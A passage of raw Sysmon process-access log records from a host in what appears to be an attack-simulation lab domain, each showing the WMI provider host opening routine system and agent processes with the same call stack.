Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026962Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026961Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026960Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026959Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026958Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026957Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026956Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026955Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026954Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026953Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026952Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026951Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026950Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026949Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026948Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026947Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026946Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026945Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026944Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026943Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 